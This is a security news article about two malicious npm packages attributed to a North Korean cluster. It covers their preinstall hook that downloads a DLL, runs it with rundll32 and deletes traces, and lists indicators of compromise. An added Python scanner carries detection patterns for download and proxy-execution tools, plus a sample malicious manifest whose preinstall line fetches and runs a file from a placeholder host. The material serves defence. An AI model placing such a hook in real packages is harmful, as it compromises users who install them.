North Korean Hackers Attacking Windows Users With Weaponized npm Files

Scalable package scanning across PyPI and npm using the GuardDog tool identified two malicious packages linked to a DPRK-aligned threat actor cluster dubbed "Wired Pungsan."
The cluster strongly overlaps with Microsoft's MOONSTONE SLEET, indicating a sophisticated supply chain attack vector.
The packages serve as initial access points for malware distribution, enabling data exfiltration, credential theft, and lateral movement within targeted environments.

npm user nagasiren978 uploaded two malicious packages, "harthat-hash" and "harthat-api," on July 7th, 2024, which downloaded additional malware from a suspected North Korean C2 server.
The server distributes malicious batch scripts, and a DLL points to Windows systems as the intended target, which is consistent with MOONSTONE SLEET, a North Korean threat actor that Microsoft has identified.
The two suspicious npm packages, harthat-hash and harthat-api, exhibit malicious behavior by using a pre-install script to download a malicious DLL from a remote server, execute it using rundll32, and then self-destruct.
The packages are nearly identical except for a different identifier in the download URL, suggesting a campaign targeting multiple victims with potentially different payloads.
The malicious npm package named harthat-api impersonates the legitimate package Hardhat by using names similar to those of the legitimate package.
While the code originates from the popular node-config repository, the malicious package modifies the package.json file to remove the preinstall script and change the name to config.
It also includes two additional files, deference.js and pk.json, whose purposes are not analyzed in this excerpt.
The preinstall script downloads a DLL file disguised as a temporary file from a remote server, renames it to "package.db," and executes it using the "rundll32" system utility.
This technique, known as "System Binary Proxy Execution," attempts to evade detection and then cleans up by deleting the downloaded DLL and restoring the original "package.json" file, hiding its malicious activity.
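The install-time behavior described above (an npm lifecycle hook that fetches a file, hands it to rundll32, and then removes its traces) is exactly what a manifest scanner can flag before installation. The following is an added example written for this article, not code from Datadog, GuardDog or the packages themselves; the package.json content, the hook command, the hostname and the pattern list are all constructed for illustration.

```python
import json
import re

# Lifecycle hooks npm runs automatically during install; a malicious package
# needs one of these to execute code without the victim ever importing it.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns mirroring the three stages described in the article: a remote
# download, execution through a trusted system binary (rundll32), and
# cleanup that deletes the dropped file or rewrites package.json.
SUSPICIOUS = {
    "remote_download": re.compile(
        r"https?://|\bcurl\b|\bwget\b|Invoke-WebRequest|\.download\(", re.I),
    "proxy_execution": re.compile(
        r"\brundll32(\.exe)?\b|\bregsvr32\b|\bmshta\b", re.I),
    "self_cleanup": re.compile(
        r"\bdel\b|\brm\b|unlinkSync|package\.json", re.I),
}


def scan_package_json(text: str) -> dict:
    """Return {hook_name: [matched_pattern_labels]} for every install-time
    hook whose command matches at least one suspicious pattern."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts") or {}
    findings = {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [label for label, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if hits:
            findings[hook] = hits
    return findings


# Constructed sample manifests modelled on the article's description; the
# hostname is a placeholder, not the real download server.
SAMPLE_MALICIOUS = json.dumps({
    "name": "config", "version": "1.3.1",
    "scripts": {"preinstall": "curl -o Temp.b http://c2.example.invalid/dl?id=1"
                " && ren Temp.b package.db && rundll32 package.db,GenerateKeyW"
                " && del package.db"},
})
SAMPLE_BENIGN = json.dumps({"name": "config", "scripts": {"test": "mocha"}})

if __name__ == "__main__":
    print(scan_package_json(SAMPLE_MALICIOUS))  # flags preinstall, 3 labels
    print(scan_package_json(SAMPLE_BENIGN))     # {}
```

Run it against the package.json of a tarball fetched with `npm pack` before installing, so the hook is inspected rather than executed.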

The Datadog Security Research team's analysis of the malicious DLL revealed a seemingly benign binary without any apparent malicious functionality. It exported two functions, one of which, GenerateKeyW, is expected to contain malicious code.
Static and dynamic analysis failed to reveal any self-modification or malicious behavior within the DLL.
The absence of malicious code suggests that the DLL is either an incomplete or a testing version, indicating the threat actor is possibly experimenting with their infrastructure or made an operational error.
In a recent attack, threat actors compromised targets via the malicious npm packages harthat-api-v1.3.1.zip and harthat-hash-v1.3.3.zip, which seemingly contained copied content to appear legitimate.
The malicious payloads were downloaded from IP address 142.111.77.196. Potential indicators of compromise (IOCs) include the filename Temp.b (also known as package.db) and its SHA256 hash, d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277.
Source credit: cybersecuritynews.com